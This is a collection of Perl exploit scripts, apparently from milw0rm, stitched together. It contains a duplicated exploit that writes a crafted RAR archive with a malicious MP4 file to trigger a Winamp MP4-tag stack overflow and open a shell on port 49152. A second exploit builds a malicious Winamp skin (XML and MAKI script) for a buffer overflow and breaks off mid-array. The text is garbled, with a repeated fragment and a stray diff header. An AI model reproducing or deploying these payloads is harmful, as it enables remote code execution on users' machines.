"\x25\xAE\x74\x6C\x6C\x18\xC6\xDE\x86\xF5\x9C\x64\xDD\x9B\xB3".
"\x66\xF3\x93\x84\xE7\x14\xE1\xBB\x3E\x0A\x4E\x31\x1A\xDE\xC8".
"\xC4\xD9\xAD\xA7\xA4\x73\xA8\x33\xE0\xD8\x33\xE4\xF1\x98\xF4".
"\x6D\x90\x0C\x03\x03\x00\xD0\x7B\x06\x31\x8F\xE2\x44\xB5\x4E".
"\x93\x94\xE1\x22\x51\x45\x03\x0C\xCC\x30\x18\x66\x7F\x0B\x16".
"\xE0\x0D\x83\xC1\xD8\x3E\x3B\xBB\x12\x93\xF8\x0D\xAC\xC5\x79".
"\x77\xEA\xAA\xF5\x7C\x78\x5E\x7F\x35\x74\xBD\x75\x5E\x55\xF1".
"\xF5\x2F\xDE\xF5\xDD\x5D\xDD\x25\x4A\xF8\xD2\xBE\x16\x92\x04".
"\x17\xDF\xB2\xAC\xDC\xDD\x0E\x6D\x06\x62\xAD\x0C\xAC\x93\x92".
"\x0F\xCE\xAF\xCB\xA1\xCB\xFD\x19\x08\x10\x7B\x25\xA0\xBA\x9E".
"\xC5\xEF\x6B\xF1\xE9\x70\xFF\x7C\xFE\x14\x16\x3B\x81\xB6\xFB".
"\xEC\xFB\xF2\x55\xA8\x07\xDF\xA5\x57\x80\xE7\x63\x1D\x63\xFD".
"\xCC\xCF\xB3\xA5\x59\x2A\x73\xD4\x67\x67\x66\x7A\x0E\x6F\xBD".
"\xB5\x39\x9E\x25\x60\xD8\x90\x6F\x0A\x85\x56\x55\xFE\x4A\x85".
"\x6A\x3D\x08\xAB\x6F\xF8\x67\xAB\x3A\xBF\x8B\xBB\xF3\x79\xD4".
"\x66\x77\xCE\xA3\xA9\xDB\x1B\x21\x50\x08\xF5\x3D\xCA\xF2\xEF".
"\x7D\x5D\xE4\xFD\x9E\xE7\x5F\xB5\xD8\x4F\xDD\xF9\xFE\x4F\x8F".
"\xEB\x4F\xD6\x4F\x56\x08\xC6\x0A\xBA\xB0\xBB\x75\xA1\xC8\x1D".
"\xCE\xE1\x32\x77\x29\x36\x5B\xFC\x04\x58\xCD\x8B\x68\xCC\xD9".
"\x51\x8D\x08\x41\xC2\xDF\x21\xE3\xFE\x47\xB2\x0D\x75\x2C\x7E".
"\x09\xA5\x78\xD6\x95\x10\x42\x38\x56\xD5\xD6\xDF\x9F\x3B\x74".
"\x8E\x2E\x32\xD8\x42\x25\xDB\x22\x75\x96\xDB\x41\x48\x6A\xFE".
"\x94\x56\xB3\xE3\xAD\xA5\x3A\x25\x36\xAC\xEA\xC5\x8B\x4A\x6B".
"\x32\xF9\xD9\xFD\x2C\x2F\x6F\x48\xD9\xAF\xE8\x44\xE2\x1D\x9C".
"\x8A\x9E\x49\x57\x99\x08\x57\x95\xF9\x0C\xDA\x97\xA4\xB4\x96".
"\x4E\xCC\x63\xA8\x56\x9B\x03\xF6\x3D\xE1\xA2\x95\x20\x33\xC0".
"\x60\x54\xD7\x33\xF7\x6D\xEB\x13\xFF\x64\xC6\x94\x45\xA6\x34".
"\xD8\x23\x99\xA0\xB2\xE3\x41\x58\x16\xE9\x92\x30\xB4\xE0\x4D".
"\x26\x1C\x71\xDD\xBE\xA2\x24\xDA\x30\xA4\x51\xB5\xA8\x0C\xEE".
"\xB0\xD2\xCB\x75\x72\xC7\x70\xE8\x6F\x71\x56\xF2\xCB\xAA\xF1".
"\xD9\xF2\xC9\xA8\xDB\x4A\x78\x9A\x3D\x10\x84\x68\x7A\x63\xEC".
"\x87\xFA\x84\x63\x79\x46\xEB\xBC\xA1\x31\xC1\xE0\x3B\xA1\x2D".
"\xD7\x32\xCB\xCE\xC0\x0F\x40\x2C\x9E\x33\x3B\x4D\xF1\x91\xD7".
"\x0F\xB0\x11\xF6\xC8\x2E\x16\xE8\x1A\x47\x08\xE2\x46\xC7\x23".
"\x00\x8A\x65\xB0\x63\x61\x39\x68\x36\x47\x24\xC2\xDA\xE9\x07".
"\xFB\x80\x43\x46\x97\x40\x1B\x6A\xE0\x3A\xBC\xEE\x7B\x5A\x60".
"\x66\x4C\x10\xB7\xF3\x89\x99\x28\x13\x38\x01\x1E\x00\x65\x70".
"\x3E\x01\xA2\x9E\x8D\x52\x43\x72\x63\x5A\x0F\x1E\x96\xD5\x89".
"\xEC\x3F\x2D\xBB\x6E\x8B\x60\x9B\x09\x9F\x26\x8F\x41\x8F\x74".
"\xE7\xCA\xDE\xA6\x28\xB4\x75\x75\x2A\x31\xFC\x8C\x0F\xC9\x4A".
"\x00\x86\xCC\xDE\xB9\xBE\xD5\xC5\xE5\x02\x8E\xA1\x09\xE1\x32".
"\x7C\x74\x38\xB5\xE7\xC9\x7C\x0D\x6D\x37\xB4\xF8\x26\xD4\x7A".
"\x21\x16\x85\xC3\x97\xDE\x85\xBE\xA5\x0E\x68\x28\xAA\x02\xB5".
"\x04\xF6\x3C\x6D\x10\x3B\xDC\x6F\x58\x13\x41\x6B\x86\x05\xDC".
"\xB4\xDD\x1A\xEB\x68\x8E\x00\xE7\xC5\x66\x87\x1D\x37\x57\x09".
"\x0A\x1C\x6C\x4C\x14\x98\xF8\x69\x79\x84\xB8\xB7\x7C\x46\x93".
"\x0D\x0D\xB7\xC5\xC1\xC0\x46\x99\x36\x1A\x2C\x2C\x2E\x67\x1D".
"\x1A\x2C\x54\x56\x92\x14\x58\x16\x5A\x34\xB7\xF8\x1D\xFF\x5F".
"\x90\xEF\x25\xEB\xCD\x5C\xC0\x05\xF1\x7E\x8D\x22\x5C\x7C\x7C".
"\x4B\xF4\x58\xDD\x54\x58\x37\x70\x04\x69\x53\x58\x58\x38\x77".
"\x55\xA4\x06\x0E\x4D\x8C\x93\x07\x1B\x09\x1F\x4E\x1E\x43\xD2".
"\xEC\x9A\xDC\xA5\xBF\xC2\x44\x9A\xBE\x6E\x86\x9F\xED\xF5\xF9".
"\x0E\xB1\xEE\xF5\xFB\x1E\xF7\x67\xB5\xEF\xF6\xFE\x0E\xE7\xFE".
"\x6D\xC8\xAF\x2C\xA3\xAF\x7F\x31\xA9\xE8\xB8\x49\xE6\x7C\x54".
"\x91\x8D\x9D\x32\x9A\xE9\xD6\x66\xA7\xD2\x87\x8C\x8E\xC7\x39".
"\x4E\x5E\x55\x8F\xCA\xB7\x43\x05\x3F\x17\xCC\xB0\x96\xA2\x98".
"\xC5\x91\x42\x3A\xA1\x16\x0D\x57\x9B\x66\xF1\x6B\x95\x18\x32".
"\x57\xB8\xB4\x1D\x15\x01\xC5\x4D\xD8\x26\x41\x90\x01\x09\x6E".
"\x1F\x48\x24\x43\x84\x40\xAC\x4E\x6B\xB9\xCC\xE7\x5A\xC2\xA6".
"\xDD\xC1\x8F\x22\x55\x77\x34\x97\x93\x6B\x6C\xCE\xAE\xF6\x5C".
"\x14\xE6\x28\x0D\x15\x2E\x01\x81\xB2\x25\x6C\x51\xE1\x3B\x2E".
"\x1B\x43\xD9\x86\x5C\x25\xF4\x74\x84\x35\xBA\xC3\x77\xEC\x92".
"\xF4\x48\xD4\xE3\xA6\xD2\x38\x3A\xB3\x52\x3E\xF5\x49\x11\xA9".
"\x32\x89\xC8\xDF\x8C\xDE\x10\xC8\x73\x2C\x05\x47\xA1\xB2\x4B".
"\x0D\x5E\x59\xCF\xE9\x14\x1A\x57\x1D\x02\x7F\xD4\x97\x13\xF7".
"\x77\x70\xD6\xD7\xA1\x31\x68\xBD\x9C\x00\xC9\xFC\x75\x0B\x6F".
"\xC2\x50\x4B\xEF\x09\xAA\x09\x9C\xB8\xDB\x64\xF0\xAF\x38\x08".
"\xD9\xC1\xD3\x5D\x6B\x30\x16\xB4\x68\xC5\xC7\xD2\x2E\x4C\xAB".
"\x75\xCE\xC5\x81\x0E\xBB\x7E\x83\x2D\xC3\x35\x16\x10\xD1\x79".
"\x63\x2E\x1D\xC2\xE9\xEF\x9B\x96\x0A\x52\xF5\xA4\x35\x5C\x63".
"\xD8\xC6\x1E\x55\xEE\xF8\x7D\xDE\x0F\x09\xD4\x20\x4E\xAF\x3F".
"\x2E\xE8\xE9\x0E\x8F\x55\x13\xE4\xA9\xF1\x65\xFF\xC2\xF4\xAA".
"\xD5\x67\x66\x9C\x90\x9D\x08\x8E\xDE\x26\x46\x72\x9B\xBF\x97".
"\x18\x1E\xAA\x9F\x69\x50\x01\xFF\x10\xC4\x3D\x7B\x00\x40\x07".
"\x00";
# size = 1201 bytes
open(code, ">unrarme.rar") || die "Can't Write temporary File\n";
binmode (code);
print code $rar_data;
close (code);
print "\nFile ready, have fun..\n";
# milw0rm.com [2007-12-08]
#!/bin/perl
#
# Nullsoft Winamp MP4 tags Stack Overflow
#
# 0-day discovered and exploited by SYS 49152
#
# Tested on win XP SP2 ENG
# Tuned for Nullsoft Winamp 5.32 d.i.
# Shell on port 49152
#
# usage:
# well, not much fun for you kids here ..
# to get the shell you have to use ALT+3 and press UPDATE.
# Instead this one is VERY interesting for the exploiters around..
# this is an unicode sploit where in addition about half
# of the 0x0-0xff range can't be used..
# I'm quite curious to see if someone understands how I did..
# if this is the case drop me a mail with the magic word
# to gforce(put the @ here)operamail(put the . here)com
#
# btw
# due to some complaints by some kids that were having serious
# problems in using winzip, this time I tried with winrar :-)
#
#
#update:
#the latest 5.5 seems patched.
#the winamp version 5.32 reflects the date when I last updated
#this code, 'cause I exploited this one more than an year ago.
#I see that marsu exploited the same bug about six months ago,
#when I did the big mistake to show this one to some "friends"..
#I'm sure that marsu can even give the details on how this bug works :-)
# begin binary data:
my $rar_data = # code 724983
"\x52\x61\x72\x21\x1A\x07\x00\xCF\x90\x73\x00\x00\x0D\x00\x00".
"\x00\x00\x00\x00\x00\xBF\x95\x74\x20\x80\x3C\x00\x5A\x04\x00".
"\x00\x70\x09\x00\x00\x02\x0B\x7C\xFB\x08\xB3\xB0\x24\x36\x1D".
"\x33\x1C\x00\x20\x00\x00\x00\x53\x59\x53\x5F\x34\x39\x31\x35".
"\x32\x5F\x4D\x50\x34\x5F\x66\x6F\x72\x5F\x77\x69\x6E\x61\x6D".
"\x70\x2E\x6D\x70\x34\x0C\x1D\x51\x10\x8D\x0F\xCD\x81\x1C\x8A".
"\x25\xAE\x74\x6C\x6C\x18\xC6\xDE\x86\xF5\x9C\x64\xDD\x9B\xB3".
"\x66\xF3\x93\x84\xE7\x14\xE1\xBB\x3E\x0A\x4E\x31\x1A\xDE\xC8".
"\xC4\xD9\xAD\xA7\xA4\x73\xA8\x33\xE0\xD8\x33\xE4\xF1\x98\xF4".
"\x6D\x90\x0C\x03\x03\x00\xD0\x7B\x06\x31\x8F\xE2\x44\xB5\x4E".
"\x93\x94\xE1\x22\x51\x45\x03\x0C\xCC\x30\x18\x66\x7F\x0B\x16".
"\xE0\x0D\x83\xC1\xD8\x3E\x3B\xBB\x12\x93\xF8\x0D\xAC\xC5\x79".
"\x77\xEA\xAA\xF5\x7C\x78\x5E\x7F\x35\x74\xBD\x75\x5E\x55\xF1".
"\xF5\x2F\xDE\xF5\xDD\x5D\xDD\x25\x4A\xF8\xD2\xBE\x16\x92\x04".
"\x17\xDF\xB2\xAC\xDC\xDD\x0E\x6D\x06\x62\xAD\x0C\xAC\x93\x92".
"\x0F\xCE\xAF\xCB\xA1\xCB\xFD\x19\x08\x10\x7B\x25\xA0\xBA\x9E".
"\xC5\xEF\x6B\xF1\xE9\x70\xFF\x7C\xFE\x14\x16\x3B\x81\xB6\xFB".
"\xEC\xFB\xF2\x55\xA8\x07\xDF\xA5\x57\x80\xE7\x63\x1D\x63\xFD".
"\xCC\xCF\xB3\xA5\x59\x2A\x73\xD4\x67\x67\x66\x7A\x0E\x6F\xBD".
"\xB5\x39\x9E\x25\x60\xD8\x90\x6F\x0A\x85\x56\x55\xFE\x4A\x85".
"\x6A\x3D\x08\xAB\x6F\xF8\x67\xAB\x3A\xBF\x8B\xBB\xF3\x79\xD4".
"\x66\x77\xCE\xA3\xA9\xDB\x1B\x21\x50\x08\xF5\x3D\xCA\xF2\xEF".
"\x7D\x5D\xE4\xFD\x9E\xE7\x5F\xB5\xD8\x4F\xDD\xF9\xFE\x4F\x8F".
"\xEB\x4F\xD6\x4F\x56\x08\xC6\x0A\xBA\xB0\xBB\x75\xA1\xC8\x1D".
"\xCE\xE1\x32\x77\x29\x36\x5B\xFC\x04\x58\xCD\x8B\x68\xCC\xD9".
"\x51\x8D\x08\x41\xC2\xDF\x21\xE3\xFE\x47\xB2\x0D\x75\x2C\x7E".
"\x09\xA5\x78\xD6\x95\x10\x42\x38\x56\xD5\xD6\xDF\x9F\x3B\x74".
"\x8E\x2E\x32\xD8\x42\x25\xDB\x22\x75\x96\xDB\x41\x48\x6A\xFE".
"\x94\x56\xB3\xE3\xAD\xA5\x3A\x25\x36\xAC\xEA\xC5\x8B\x4A\x6B".
"\x32\xF9\xD9\xFD\x2C\x2F\x6F\x48\xD9\xAF\xE8\x44\xE2\x1D\x9C".
"\x8A\x9E\x49\x57\x99\x08\x57\x95\xF9\x0C\xDA\x97\xA4\xB4\x96".
"\x4E\xCC\x63\xA8\x56\x9B\x03\xF6\x3D\xE1\xA2\x95\x20\x33\xC0".
"\x60\x54\xD7\x33\xF7\x6D\xEB\x13\xFF\x64\xC6\x94\x45\xA6\x34".
"\xD8\x23\x99\xA0\xB2\xE3\x41\x58\x16\xE9\x92\x30\xB4\xE0\x4D".
"\x26\x1C\x71\xDD\xBE\xA2\x24\xDA\x30\xA4\x51\xB5\xA8\x0C\xEE".
"\xB0\xD2\xCB\x75\x72\xC7\x70\xE8\x6F\x71\x56\xF2\xCB\xAA\xF1".
"\xD9\xF2\xC9\xA8\xDB\x4A\x78\x9A\x3D\x10\x84\x68\x7A\x63\xEC".
"\x87\xFA\x84\x63\x79\x46\xEB\xBC\xA1\x31\xC1\xE0\x3B\xA1\x2D".
"\xD7\x32\xCB\xCE\xC0\x0F\x40\x2C\x9E\x33\x3B\x4D\xF1\x91\xD7".
"\x0F\xB0\x11\xF6\xC8\x2E\x16\xE8\x1A\x47\x08\xE2\x46\xC7\x23".
"\x00\x8A\x65\xB0\x63\x61\x39\x68\x36\x47\x24\xC2\xDA\xE9\x07".
"\xFB\x80\x43\x46\x97\x40\x1B\x6A\xE0\x3A\xBC\xEE\x7B\x5A\x60".
"\x66\x4C\x10\xB7\xF3\x89\x99\x28\x13\x38\x01\x1E\x00\x65\x70".
"\x3E\x01\xA2\x9E\x8D\x52\x43\x72\x63\x5A\x0F\x1E\x96\xD5\x89".
"\xEC\x3F\x2D\xBB\x6E\x8B\x60\x9B\x09\x9F\x26\x8F\x41\x8F\x74".
"\xE7\xCA\xDE\xA6\x28\xB4\x75\x75\x2A\x31\xFC\x8C\x0F\xC9\x4A".
"\x00\x86\xCC\xDE\xB9\xBE\xD5\xC5\xE5\x02\x8E\xA1\x09\xE1\x32".
"\x7C\x74\x38\xB5\xE7\xC9\x7C\x0D\x6D\x37\xB4\xF8\x26\xD4\x7A".
"\x21\x16\x85\xC3\x97\xDE\x85\xBE\xA5\x0E\x68\x28\xAA\x02\xB5".
"\x04\xF6\x3C\x6D\x10\x3B\xDC\x6F\x58\x13\x41\x6B\x86\x05\xDC".
"\xB4\xDD\x1A\xEB\x68\x8E\x00\xE7\xC5\x66\x87\x1D\x37\x57\x09".
"\x0A\x1C\x6C\x4C\x14\x98\xF8\x69\x79\x84\xB8\xB7\x7C\x46\x93".
"\x0D\x0D\xB7\xC5\xC1\xC0\x46\x99\x36\x1A\x2C\x2C\x2E\x67\x1D".
"\x1A\x2C\x54\x56\x92\x14\x58\x16\x5A\x34\xB7\xF8\x1D\xFF\x5F".
"\x90\xEF\x25\xEB\xCD\x5C\xC0\x05\xF1\x7E\x8D\x22\x5C\x7C\x7C".
"\x4B\xF4\x58\xDD\x54\x58\x37\x70\x04\x69\x53\x58\x58\x38\x77".
"\x55\xA4\x06\x0E\x4D\x8C\x93\x07\x1B\x09\x1F\x4E\x1E\x43\xD2".
"\xEC\x9A\xDC\xA5\xBF\xC2\x44\x9A\xBE\x6E\x86\x9F\xED\xF5\xF9".
"\x0E\xB1\xEE\xF5\xFB\x1E\xF7\x67\xB5\xEF\xF6\xFE\x0E\xE7\xFE".
"\x6D\xC8\xAF\x2C\xA3\xAF\x7F\x31\xA9\xE8\xB8\x49\xE6\x7C\x54".
"\x91\x8D\x9D\x32\x9A\xE9\xD6\x66\xA7\xD2\x87\x8C\x8E\xC7\x39".
"\x4E\x5E\x55\x8F\xCA\xB7\x43\x05\x3F\x17\xCC\xB0\x96\xA2\x98".
"\xC5\x91\x42\x3A\xA1\x16\x0D\x57\x9B\x66\xF1\x6B\x95\x18\x32".
"\x57\xB8\xB4\x1D\x15\x01\xC5\x4D\xD8\x26\x41\x90\x01\x09\x6E".
"\x1F\x48\x24\x43\x84\x40\xAC\x4E\x6B\xB9\xCC\xE7\x5A\xC2\xA6".
"\xDD\xC1\x8F\x22\x55\x77\x34\x97\x93\x6B\x6C\xCE\xAE\xF6\x5C".
"\x14\xE6\x28\x0D\x15\x2E\x01\x81\xB2\x25\x6C\x51\xE1\x3B\x2E".
"\x1B\x43\xD9\x86\x5C\x25\xF4\x74\x84\x35\xBA\xC3\x77\xEC\x92".
"\xF4\x48\xD4\xE3\xA6\xD2\x38\x3A\xB3\x52\x3E\xF5\x49\x11\xA9".
"\x32\x89\xC8\xDF\x8C\xDE\x10\xC8\x73\x2C\x05\x47\xA1\xB2\x4B".
"\x0D\x5E\x59\xCF\xE9\x14\x1A\x57\x1D\x02\x7F\xD4\x97\x13\xF7".
"\x77\x70\xD6\xD7\xA1\x31\x68\xBD\x9C\x00\xC9\xFC\x75\x0B\x6F".
"\xC2\x50\x4B\xEF\x09\xAA\x09\x9C\xB8\xDB\x64\xF0\xAF\x38\x08".
"\xD9\xC1\xD3\x5D\x6B\x30\x16\xB4\x68\xC5\xC7\xD2\x2E\x4C\xAB".
"\x75\xCE\xC5\x81\x0E\xBB\x7E\x83\x2D\xC3\x35\x16\x10\xD1\x79".
"\x63\x2E\x1D\xC2\xE9\xEF\x9B\x96\x0A\x52\xF5\xA4\x35\x5C\x63".
"\xD8\xC6\x1E\x55\xEE\xF8\x7D\xDE\x0F\x09\xD4\x20\x4E\xAF\x3F".
"\x2E\xE8\xE9\x0E\x8F\x55\x13\xE4\xA9\xF1\x65\xFF\xC2\xF4\xAA".
"\xD5\x67\x66\x9C\x90\x9D\x08\x8E\xDE\x26\x46\x72\x9B\xBF\x97".
"\x18\x1E\xAA\x9F\x69\x50\x01\xFF\x10\xC4\x3D\x7B\x00\x40\x07".
"\x00";
# size = 1201 bytes
open(code, ">unrarme.rar") || die "Can't Write temporary File\n";
binmode (code);
print code $rar_data;
close (code);
print "\nFile ready, have fun..\n";
# milw0rm.com [2007-12-08]


@ -1,207 +1,207 @@
#!/usr/bin/perl
#
# WinAmp <= 5.541 Skin Universal Buffer Overflow Exploit
#
# Discovered and Exploited by SkD (skdrat@hotmail.com)
# -----------------------------------------------------
# WinAmp = http://www.winamp.com
#
# Who doesn't use WinAmp?
#
# This was an 0day for sometime but with the release of
# the new version 5.55, it fixed the buffer overflow vuln.
# I made it universal and very reliable.
# The vulnerability is a mixture of a standard buffer overflow
# with a SEH overflow, so to make it more stable,
# both of the scenarios will be exploited accordingly when one
# is triggered with my exploit :).
# The exploit can also run any shellcode (alpha) so this makes
# it ever so useful.
#
# Instructions:-
# -Run script.
# -Copy the created exploit directory "SkD's Skin" to
# "C:\Program Files\WinAmp\Skins" OR just install it.
# -Choose the skin from WinAmp :)
#
# Enjoy it ladies and gents :)
#
# Shouts out to: -KkD
# -InTeL
# -Jayji
# -str0ke
#
# Note: Author has no responsibility over the damage done with this!
use strict;
use warnings;
my $skin_xml = "\xEF\xBB\xBF\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D".
"\x22\x55\x54\x46\x2D\x38\x22\x20\x73\x74\x61\x6E\x64\x61\x6C\x6F\x6E\x65\x3D\x22\x79\x65\x73\x22\x3F\x3E\x0D\x0A\x0D\x0A\x3C\x57".
"\x69\x6E\x61\x6D\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69\x6F\x6E\x4C\x61\x79\x65\x72\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31".
"\x2E\x33\x34\x22\x3E\x0D\x0A\x09\x3C\x73\x6B\x69\x6E\x69\x6E\x66\x6F\x3E\x0D\x0A\x09\x09\x3C\x76\x65\x72\x73\x69\x6F\x6E\x3E\x31".
"\x2E\x32\x3C\x2F\x76\x65\x72\x73\x69\x6F\x6E\x3E\x0D\x0A\x09\x09\x3C\x6E\x61\x6D\x65\x3E\x42\x65\x6E\x74\x6F\x3C\x2F\x6E\x61\x6D".
"\x65\x3E\x0D\x0A\x09\x09\x3C\x61\x75\x74\x68\x6F\x72\x3E\x53\x6B\x44\x3C\x2F\x61\x75\x74\x68\x6F\x72\x3E\x0D\x0A\x09\x09\x3C\x63".
"\x6F\x6D\x6D\x65\x6E\x74\x3E\x53\x6B\x44\x3C\x2F\x63\x6F\x6D\x6D\x65\x6E\x74\x3E\x0D\x0A\x09\x09\x3C\x65\x6D\x61\x69\x6C\x3E\x73".
"\x6B\x64\x72\x61\x74\x40\x68\x6F\x74\x6D\x61\x69\x6C\x2E\x63\x6F\x6D\x3C\x2F\x65\x6D\x61\x69\x6C\x3E\x0D\x0A\x09\x09\x3C\x73\x63".
"\x72\x65\x65\x6E\x73\x68\x6F\x74\x3E\x53\x6B\x44\x73\x68\x6F\x74\x2E\x70\x6E\x67\x3C\x2F\x73\x63\x72\x65\x65\x6E\x73\x68\x6F\x74".
"\x3E\x0D\x0A\x09\x09\x3C\x68\x6F\x6D\x65\x70\x61\x67\x65\x3E\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x53\x6B\x44\x2E\x63\x6F".
"\x6D\x2F\x3C\x2F\x68\x6F\x6D\x65\x70\x61\x67\x65\x3E\x0D\x0A\x09\x3C\x2F\x73\x6B\x69\x6E\x69\x6E\x66\x6F\x3E\x0D\x0A\x0D\x0A\x09".
"\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x73\x20\x73\x65\x63\x74\x69\x6F\x6E\x3D\x22\x67\x65\x6E\x65\x72\x61\x6C\x22\x3E".
"\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x46\x22\x20\x61\x63".
"\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x46\x49\x4C\x45\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63".
"\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x50\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D".
"\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x50\x4C\x41\x59\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74".
"\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x4F\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B".
"\x45\x59\x5F\x4F\x50\x54\x49\x4F\x4E\x53\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62".
"\x69\x6E\x64\x3D\x22\x41\x6C\x74\x2B\x49\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x56".
"\x49\x45\x57\x22\x20\x2F\x3E\x0D\x0A\x09\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x41\x6C".
"\x74\x2B\x48\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x4D\x45\x4E\x55\x48\x4F\x54\x4B\x45\x59\x5F\x48\x45\x4C\x50\x22\x20\x2F\x3E".
"\x0D\x0A\x09\x3C\x2F\x61\x63\x63\x65\x6C\x65\x72\x61\x74\x6F\x72\x73\x3E\x0D\x0A\x0D\x0A\x09\x3C\x61\x63\x63\x65\x6C\x65\x72\x61".
"\x74\x6F\x72\x73\x20\x73\x65\x63\x74\x69\x6F\x6E\x3D\x22\x6E\x6F\x72\x6D\x61\x6C\x22\x3E\x0D\x0A\x09\x09\x09\x3C\x61\x63\x63\x65".
"\x6C\x65\x72\x61\x74\x6F\x72\x20\x62\x69\x6E\x64\x3D\x22\x73\x70\x61\x63\x65\x22\x20\x61\x63\x74\x69\x6F\x6E\x3D\x22\x53\x48\x4F".
"\x57\x5F\x43\x55\x52\x52\x45\x4E\x54\x5F\x54\x52\x41\x43\x4B\x22\x20\x2F\x3E\x0D\x0A\x09\x3C\x2F\x61\x63\x63\x65\x6C\x65\x72\x61".
"\x74\x6F\x72\x73\x3E\x0D\x0A\x0D\x0A\x09\x3C\x21\x2D\x2D\x20\x54\x68\x69\x73\x20\x53\x6B\x69\x6E\x20\x75\x73\x65\x73\x20\x73\x68".
"\x61\x72\x65\x64\x20\x47\x72\x61\x70\x68\x69\x63\x73\x2C\x20\x58\x4D\x4C\x20\x61\x6E\x64\x20\x4D\x61\x6B\x69\x20\x66\x72\x6F\x6D".
"\x20\x27\x42\x69\x67\x20\x42\x65\x6E\x74\x6F\x27\x20\x2D\x2D\x3E\x0D\x0A\x0D\x0A\x09\x3C\x73\x63\x72\x69\x70\x74\x73\x3E\x0D\x0A".
"\x09\x09\x3C\x73\x63\x72\x69\x70\x74\x20\x66\x69\x6C\x65\x3D\x22\x73\x2E\x6D\x61\x6B\x69\x22\x20\x70\x61\x72\x61\x6D\x3D\x22\x73".
"\x6D\x61\x6C\x6C\x22\x2F\x3E\x20\x3C\x21\x2D\x2D\x20\x4D\x75\x73\x74\x20\x62\x65\x20\x6C\x6F\x61\x64\x65\x64\x20\x61\x74\x20\x66".
"\x69\x72\x73\x74\x20\x2D\x2D\x3E\x0D\x0A\x09\x3C\x2F\x73\x63\x72\x69\x70\x74\x73\x3E\x0D\x0A\x0D\x0A\x09\x3C\x69\x6E\x63\x6C\x75".
"\x64\x65\x20\x66\x69\x6C\x65\x3D\x22\x73\x2E\x6D\x61\x6B\x69\x22\x2F\x3E\x0D\x0A\x0D\x0A\x09\x3C\x73\x63\x72\x69\x70\x74\x73\x3E".
"\x0D\x0A\x09\x09\x3C\x73\x63\x72\x69\x70\x74\x20\x66\x69\x6C\x65\x3D\x22\x73\x2E\x6D\x61\x6B\x69\x22\x20\x70\x61\x72\x61\x6D\x3D".
"\x22\x31\x33\x30\x2C\x31\x38\x22\x2F\x3E\x0D\x0A\x09\x3C\x2F\x73\x63\x72\x69\x70\x74\x73\x3E\x0D\x0A\x0D\x0A\x3C\x2F\x57\x69\x6E".
"\x61\x6D\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69\x6F\x6E\x4C\x61\x79\x65\x72\x3E";
my $maki_script1 = "\x46\x47\x03\x04\x17\x00\x00\x00\x27\x00\x00\x00\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5\x32\x35\xF3\xE7\x64\x0F\xF5\xD6".
"\xFA\x93\xB7\x49\x93\xF1\xBA\x66\xEF\xAE\x3E\x98\x7B\xC4\x0D\xE9\x0D\x84\xE7\x4A\xB0\x2C\x04\x0B\xD2\x75\xF7\xFC\xB5\x3A\x02\xB2".
"\x4D\x43\xA1\x4B\xBE\xAE\x59\x63\x75\x03\xF3\xC6\x78\x57\xC6\x87\x43\xE7\xFE\x49\x85\xF9\x09\xCC\x53\x2A\xFD\x56\x65\x36\x60\x38".
"\x1B\x46\xA7\x42\xAA\x75\xD8\x3F\x66\x67\xBF\x73\xF4\x7A\x78\xF4\xBB\xB2\xF7\x4E\x9C\xFB\xE7\x4B\xA9\xBE\xA8\x8D\x02\x0C\x37\x3A".
"\xBF\x3C\x9F\x43\x84\xF1\x86\x88\x5B\xCF\x1E\x36\xB6\x5B\x0C\x5D\xE1\x7D\x1F\x4B\xA7\x0F\x8D\x16\x59\x94\x19\x41\x99\xE1\xE3\x4E".
"\x36\xC6\xEC\x4B\x97\xCD\x78\xBC\x9C\x86\x28\xB0\xE5\x95\xBE\x45\x72\x20\x91\x41\x93\x5C\xBB\x5F\xF9\xF1\x17\xFD\x4E\x6D\x90\x60".
"\x7E\x53\x2E\x48\xB0\x04\xCC\x94\x61\x88\x56\x72\xC0\xBC\x3A\x40\x22\x6F\xD6\x4B\x8B\xA4\x10\xC8\x29\x93\x25\x47\x4D\x3E\xAA\x97".
"\xD0\xF4\xA8\x4F\x81\x7B\x0A\xF2\x2A\x45\x49\x83\xFA\xBB\xE4\x64\xF4\x81\xD9\x49\xB0\xC0\xA8\x5B\x2E\xC3\xBC\xFD\x3F\x5E\xB6\x62".
"\x5E\x37\x8D\x40\x8D\xEA\x76\x81\x4A\xB9\x1B\x77\xBE\x97\x4F\xCE\xB0\x77\x19\x4E\x99\x56\xD4\x98\x33\xC9\x6C\x27\x0D\x20\xC2\xA8".
"\xEB\x51\x2A\x4B\xBA\x7F\x5D\x4B\xC6\x5D\x4C\x71\x38\xBA\x1E\x8D\x9E\x48\x3E\x48\xB9\x60\x8D\x1F\x43\xC5\xC4\x05\x40\xC9\x08\x0F".
